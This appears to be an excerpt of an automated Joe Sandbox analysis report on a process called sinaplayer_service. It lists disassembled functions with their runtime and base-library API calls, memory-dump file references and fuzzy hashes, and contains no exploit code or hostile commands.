                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 003713FA
                                                                                                                                                                                                      • Part of subcall function 003716C0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,?,00371452,00000000,?,?,?,?,?,0037155F,?,?,?), ref: 003716D6
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 0037141A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@
                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 1960685668-4289949731
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?,?), ref: 00374FFA
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?,?), ref: 0037501A
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?,?), ref: 00375054
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000007,00000007,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?), ref: 003750BE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@$Xlength_error@std@@memcpy
                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 3790025958-4289949731
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000001,?,00390A45,00000000,00000000,00000001,00000000,?,?,?,0039116E,?,Content-Disposition: form-data; name=",00000000), ref: 00392493
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,00000001,?,00390A45,00000000,00000000,00000001,00000000,?,?,?,0039116E,?,Content-Disposition: form-data; name="), ref: 003924AB
                                                                                                                                                                                                    • memmove.MSVCR120(00000018,00000018,?,00000000,00000000,00000001,?,00390A45,00000000,00000000,00000001,00000000,?,?,?,0039116E), ref: 003924FD
                                                                                                                                                                                                    • memcpy.MSVCR120(00000018,00000000,00000018,00000000,00000000,00000001,?,00390A45,00000000,00000000,00000001,00000000,?,?,?,0039116E), ref: 0039251E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@Xout_of_range@std@@memcpymemmove
                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 1110030134-4289949731
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Now@TimeTicks@base@@SA?AV12@XZ.BASE(?,8285FFAB,00000000,?,?), ref: 00386624
                                                                                                                                                                                                    • ?Lock@LockImpl@internal@base@@QAEXXZ.BASE ref: 00386660
                                                                                                                                                                                                    • ?Unlock@LockImpl@internal@base@@QAEXXZ.BASE ref: 00386734
                                                                                                                                                                                                      • Part of subcall function 00386770: ?GetRef@WeakReferenceOwner@internal@base@@QBE?AVWeakReference@23@XZ.BASE(8285FFAB,8285FFAB), ref: 003867A4
                                                                                                                                                                                                      • Part of subcall function 00386770: ??0WeakPtrBase@internal@base@@IAE@ABVWeakReference@12@@Z.BASE(00000000), ref: 003867B7
                                                                                                                                                                                                      • Part of subcall function 00386770: ??1WeakReference@internal@base@@QAE@XZ.BASE ref: 003867CE
                                                                                                                                                                                                    • ?is_valid@WeakReference@internal@base@@QBE_NXZ.BASE(0038239E), ref: 003866B6
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 003866F5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Weak$Impl@internal@base@@LockReference@internal@base@@$?is_valid@Base@internal@base@@Lock@Message@logging@@Now@Owner@internal@base@@Ref@ReferenceReference@12@@Reference@23@Ticks@base@@TimeUnlock@V12@
                                                                                                                                                                                                    • String ID: Vll
                                                                                                                                                                                                    • API String ID: 4263299635-3458357932
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5D6F91
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5D6F9B
                                                                                                                                                                                                      • Part of subcall function 6C5F4670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6C5CB412,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C5F4677
                                                                                                                                                                                                    • _get_timezone.MSVCR120(?), ref: 6C5D6FBE
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6C5D6FE4
                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,23C34600,00000000), ref: 6C5D7018
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6C5D707E
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6C5D70B0
                                                                                                                                                                                                      • Part of subcall function 6C5F469B: IsProcessorFeaturePresent.KERNEL32(00000017,6C5F466F,?,?,?,?,?,?,6C5F467C,00000000,00000000,00000000,00000000,00000000,6C5CB412), ref: 6C5F469D
                                                                                                                                                                                                      • Part of subcall function 6C5F469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6C5F466F,?,?,?,?,?,?,6C5F467C,00000000,00000000), ref: 6C5F46BC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$FeatureFileInformationPresentProcessProcessorSystemTerminateZone__aullrem__crt_errno_get_timezone_invalid_parameter_invalid_parameter_noinfo_invoke_watson
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1117467957-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6C5BC8BF
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C5BC90D
                                                                                                                                                                                                      • Part of subcall function 6C5BF8AE: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,00000000,.iWl,?,6C5A2519,00000000,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E), ref: 6C5BF8BD
                                                                                                                                                                                                      • Part of subcall function 6C5BF904: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,?,6C5BC958,00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C57793F), ref: 6C5BF90A
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCMT ref: 6C5BC95F
                                                                                                                                                                                                      • Part of subcall function 6C5C5CEF: SetEvent.KERNEL32(00000000,?,6C5BC964,?,00000000,00000000), ref: 6C5C5D3D
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C57793F,00000000), ref: 6C5BC96E
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C57793F,00000000), ref: 6C5BC99C
                                                                                                                                                                                                    • TlsGetValue.KERNEL32(00000000,?,00000024,6C5A3640,00000000,?), ref: 6C5BC9BA
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,00000024,6C5A3640,00000000,?), ref: 6C5BC9C5
                                                                                                                                                                                                      • Part of subcall function 6C5C5773: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCMT ref: 6C5C57C1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Version@$Concurrency::details::Concurrency@@CriticalManager@1@Proxy::ResourceSchedulerSectionValue$BorrowedCoreCurrentEnterEventH_prolog3_IncrementLeaveStateSubscriptionThreadToggle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1834826012-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375B74
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375B84
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375B90
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375BD1
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00375C30
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$??3@?gptr@?$basic_streambuf@
                                                                                                                                                                                                    • String ID: " 7
                                                                                                                                                                                                    • API String ID: 4233710878-3920742961
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,6C570A40,00000010), ref: 6C570951
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,?,?,?,?,6C570A40,00000010), ref: 6C57099A
                                                                                                                                                                                                    • strlen.MSVCR120(?,?,?,?,?,?,?,6C570A40,00000010), ref: 6C5709ED
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,?,?,?,?,?,6C570A40,00000010), ref: 6C5709F8
                                                                                                                                                                                                    • _fwrite_nolock.MSVCR120(?,00000001,00000000,?,?,?,?,?,?,?,?,6C570A40,00000010), ref: 6C570A12
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6C570A1C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,6C570A40,00000010), ref: 6C5A4F91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __ftbuf_errno_fileno_fwrite_nolock_invalid_parameter_noinfo_lock_filestrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2817190391-0
                                                                                                                                                                                                    • Opcode ID: a7a1def52927009d52e2c67ea4533aadafc1fcddf716ce87b9cb04dae0d0b9db
                                                                                                                                                                                                    • Instruction ID: 6e60f0e006146b3483c1cefa1c42acbf727d3d1ec05838d5bb79d82997761afb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7a1def52927009d52e2c67ea4533aadafc1fcddf716ce87b9cb04dae0d0b9db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA210731905245DAEB209F768C40BAE35E1ABC1338F14831AE4349BFE0CB79C9818665
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __fltout2.LIBCMT ref: 6C580917
                                                                                                                                                                                                      • Part of subcall function 6C56B131: $I10_OUTPUT.MSVCR120(?,?,?,?,?,?,6C5D92B2,?,?,?,?,00000016,?,0000015D,?), ref: 6C56B170
                                                                                                                                                                                                      • Part of subcall function 6C56B131: strcpy_s.MSVCR120(6C5D92B2,?,?,?,?,?,?,?,?,6C5D92B2,?,?,?,?,00000016), ref: 6C56B190
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,6C5D94D6,00000000,?,6C5D94D6,?,?,?,?), ref: 6C5B1087
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,6C5D94D6,00000000,?,6C5D94D6,?,?,?,?), ref: 6C5B108E
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,?,6C5D94D6,00000000,?,6C5D94D6,?,?,?), ref: 6C5B109A
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,?,6C5D94D6,00000000,?,6C5D94D6,?,?,?), ref: 6C5B10A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$I10___fltout2strcpy_s
                                                                                                                                                                                                    • String ID: -
                                                                                                                                                                                                    • API String ID: 2050506888-2547889144
                                                                                                                                                                                                    • Opcode ID: d4e6c920f626bdc1dd89bbd66535d76c97283a829ba24c33941dd2f75549abff
                                                                                                                                                                                                    • Instruction ID: 04bcb2a94792aeb5d6a566af9a3d30244aea7b13aa3a53850990eb1b2287e433
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4e6c920f626bdc1dd89bbd66535d76c97283a829ba24c33941dd2f75549abff
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2921C272A01159EFDB04DF79CC81AEFB7A8DF89218F044569E925A7A50EB30DC048BA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6C582EB0,00000010), ref: 6C582E02
                                                                                                                                                                                                    • __doserrno.MSVCR120(6C582EB0,00000010), ref: 6C5AF011
                                                                                                                                                                                                    • _errno.MSVCR120(6C582EB0,00000010), ref: 6C5AF018
                                                                                                                                                                                                    • _errno.MSVCR120(6C582EB0,00000010), ref: 6C5AF05D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C582EB0,00000010), ref: 6C5AF068
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    • Opcode ID: c32b85972d94138f5a047ea826af32df1eb805f1babc560fa8dc97ec6f71635a
                                                                                                                                                                                                    • Instruction ID: 90be30cef7698257cd28648979931a3baead3a392c79a980415f20aa73d1bf50
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c32b85972d94138f5a047ea826af32df1eb805f1babc560fa8dc97ec6f71635a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34212931507621DAD7159F6A8C806BD7AA0AFC2328F600719D4725BFE0CB748D4647BA
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000,00000005), ref: 00380C3A
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000,00000005), ref: 00380C5E
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,00386079,?,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000), ref: 00380C9E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                                                                                                                                    • String ID: invalid string position$string too long$y`8
                                                                                                                                                                                                    • API String ID: 4248180022-475471333
                                                                                                                                                                                                    • Opcode ID: 195b992c1ca72e0187e6149f71140507c237d1efd6c402b23d66004cdc773a57
                                                                                                                                                                                                    • Instruction ID: cb7bbdb4a3bc9df929f2385dfe9437710f36eb112d775e9c7e61f96cd7541891
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 195b992c1ca72e0187e6149f71140507c237d1efd6c402b23d66004cdc773a57
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D21C0313007049FDB29AF6CD985A5AB7B9EB40750B100A6EE846CB381C771E848C798
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 003881D0: ?AsUTF8Unsafe@FilePath@base@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.BASE(?,8285FFAB,?,0039B190,000000FF,?,00388981,?,8285FFAB,?,?,00000001,?,00000001,00000000,0039A9DB), ref: 00388202
                                                                                                                                                                                                      • Part of subcall function 003881D0: ??1CallbackBase@internal@base@@IAE@XZ.BASE(0000010D,00000000,?,?,?,?,?,?,00388981,?,8285FFAB,?,?), ref: 0038823D
                                                                                                                                                                                                      • Part of subcall function 003881D0: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,00388981), ref: 0038824C
                                                                                                                                                                                                      • Part of subcall function 00387AE0: ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387B0F
                                                                                                                                                                                                      • Part of subcall function 00387AE0: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?), ref: 00387B2A
                                                                                                                                                                                                      • Part of subcall function 00387AE0: ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387B4E
                                                                                                                                                                                                      • Part of subcall function 00387AE0: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?), ref: 00387B65
                                                                                                                                                                                                      • Part of subcall function 00387A30: ??2@YAPAXI@Z.MSVCR120(0000002C), ref: 00387A5F
                                                                                                                                                                                                      • Part of subcall function 00387A30: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(?), ref: 00387A7A
                                                                                                                                                                                                      • Part of subcall function 00387A30: ??0FilePath@base@@QAE@ABV01@@Z.BASE(?), ref: 00387A9E
                                                                                                                                                                                                      • Part of subcall function 00387A30: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,?), ref: 00387ABD
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000,00000000,?,?,?,?,?,8285FFAB), ref: 00388848
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(net::FileStream::Context::OpenAsync,network_change\file_stream_context.cc,0000004D,00000000,?,?,?,?,?,8285FFAB), ref: 0038885E
                                                                                                                                                                                                      • Part of subcall function 00387DE0: ??2@YAPAXI@Z.MSVCR120(00000018,8285FFAB,?,?,0039B128,000000FF,?,0038886B,?,00000000,?,?,?,?,?,8285FFAB), ref: 00387E09
                                                                                                                                                                                                      • Part of subcall function 00387DE0: ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038886B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387E84
                                                                                                                                                                                                      • Part of subcall function 00387DE0: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B,?), ref: 00387E99
                                                                                                                                                                                                      • Part of subcall function 00387DE0: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B,?), ref: 00387EA2
                                                                                                                                                                                                      • Part of subcall function 00387DE0: ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B), ref: 00387EA7
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,8285FFAB), ref: 0038887B
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,8285FFAB), ref: 00388887
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • network_change\file_stream_context.cc, xrefs: 00388851
                                                                                                                                                                                                    • net::FileStream::Context::OpenAsync, xrefs: 00388856
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
